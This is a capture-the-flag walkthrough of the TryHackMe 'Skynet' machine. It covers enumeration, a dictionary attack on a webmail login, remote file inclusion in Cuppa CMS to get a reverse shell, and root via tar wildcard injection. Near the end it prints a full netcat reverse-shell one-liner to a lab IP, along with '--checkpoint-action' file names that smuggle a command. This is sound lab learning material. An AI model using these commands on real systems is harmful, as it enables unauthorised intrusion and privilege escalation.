Date: 03/04/2022
Difficulty: Easy
CTF: https://tryhackme.com/room/skynet
A vulnerable Terminator themed Linux machine.
What is Miles password for his emails?
First things first, let’s to a quick scan:
Ping received by the machine. as the ttl=63 we can guess it is a Linux machine (as the description says).
nmap discovered several ports open. Let’s get more info of them:
Let’s see what the webserver has:
The landing page is something like a browser (a copy of Google to be more exact).
Source code of the page doesn’t reveal nothing like a credential.
I have checked if robots.txt file exists but it doesn’t. I also tried to search some words, with no success. The site didn’t create any cookie or load any script.
Let’s proceed with the directory & files enumeration.
gobuster found some directories we have not access to. All of the discovered ones except one send us a forbidden status (403).
Let’s see what’s inside /squirrelmail
There is nothing in the source code we can use. I’m pretty sure that we’ll be using this login form in the future.
I’m going to check if the webpage is vulnerable to XSS:
Nope, nothing happens.
Let’s capture the request with burpsuite and see if there is something interesting there:
Apparently it doesn’t matter what you try to seach, it always send the submit parameter with “Skynet+Search” value.
Let’s try to change it and send “Admin” value… Just to try something:
Same results as before. This seems to be a non-exit path.
Let’s take a look at the nmap results again…
Dovecot imapd seems to be an IMAP server (used for emails). And it looks like it has activated some capabilities like LoginDisable and Pre-login… it sounds strange.
According to HackTricks:
We have connected to the Dovecot service, but I have no idea what can I do here… Aparently I can do nothing if I cannot login, so move to the next thing.
There is an SMB server exposed in the port 445, let’s see what can we see without credentials:
xdg-open smb://10.10.208.14
As anonymous, the only folder we have access to is “anonymous”:
We found a text file with a message from Miles Dyson and a folder with 3 files:
Only one of them have information, and it looks like a password list. I’m going to save it.
It would be funny if the password of Miles Dyson is part of this list, as he sent a message asking all users to change their passwords… I have to check it.
To do it I’ll use hydra, with milesdyson
as username and the log1.txt
as wordlist for passwords:
Nope. I also tried with ssh and imap with same results.
Oh, the squirrel mail login page… maybe it will work? As the wordlist is not so large, I’ll try to do a dictionary attack using BurpSuite:
First off all, let’s intercept a login request:
Send the request to intruder, configure it…
And Start the attack!
After a few minutes, the attack finishes and attending to the length of the responses, every request except one have a lenght of 3240 which probably indicates that the login has failed, let’s try to login using the credentials that generated a request with the different length as password:
Yeah! We’re in!
What is the hidden directory?
Before anything, let’s take a look to the emails:
strange email from serenakkogan, anyway I’ll take note of the test just in case:
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
Same as before it’s pretty strange, but this time it’s clearly recognizable that it is written in binary, so let’s try to convert it to something readable:
balls have zero to me to me to me to me to me to me to me to me to
Ok… Let’s move on
This one is interesting, it includes the new password for the samba service of this user.
I checked the Drafts, Sent and Trash folders but there was nothing there.
With the credentials, let’s try to log in samba share using these credentials:
Logged in! The password is correct.
The file important.txt looks… important:
I think we have found the hidden folder!
Yep we did!
What is the vulnerability called when you can include a remote file for malicious purposes?
Remote file inclusion
What is the user flag?
Let’s do a directory scan in the new folder found:
Gobuster quickly discovers the directory /administrator, let’s look whats inside:
The CMS used is something called Cuppa… Let’s look if there is any exploitable vunerability
Yeah, apparently it’s one that will allow us to do remote file inclusion, nice:
Apparently we can create a http server in our machine, hosting a php reverse shell that will be executed by the target… Let’s try:
After the http server is set up, he have to navigate to:
And we get a reverse shell, awesome!
What is the root flag?
First try is to try to see if we can cd /root
Nope.
Well, as we will be interacting with this console, let’s see if we see some ssh credentials, if not, we’ll have to stabilize the console:
No ssh credentials, time to stabilize it:
done, now let’s look for something we can use to escalate privileges.
passwd is readable, but shadow no.
As we don’t know the password of the user www-data we cannot list if there is any command that we can run with sudo.
There is a script being executed every minute as root, and it is in the /home/milesdyson/backups folder.
Let’s see if we have write permissions there:
Nope, we don’t.
Let’s try to log in as milesdyson using the password found previously with BurpSuite:
Yeah, it worked.
This user cannot enter in /root neither.
And cannot change the script… let’s see if can execute something using sudo:
Nothing. Meh… let’s use linPEAS, I’m out of ideas.
linPEAS didn’t help me this time and I had to read another write up… Apparently we can use the backup.sh script, as it creates a backup of a directory using tar, and there is a vulnerability of tar we can take advantage of (https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
So, we had to execute this code (with www-data user):
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f" > shell.sh touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" touch "/var/www/html/--checkpoint=1"
Open a netcat listener and wait for the root console:
Aaaand done.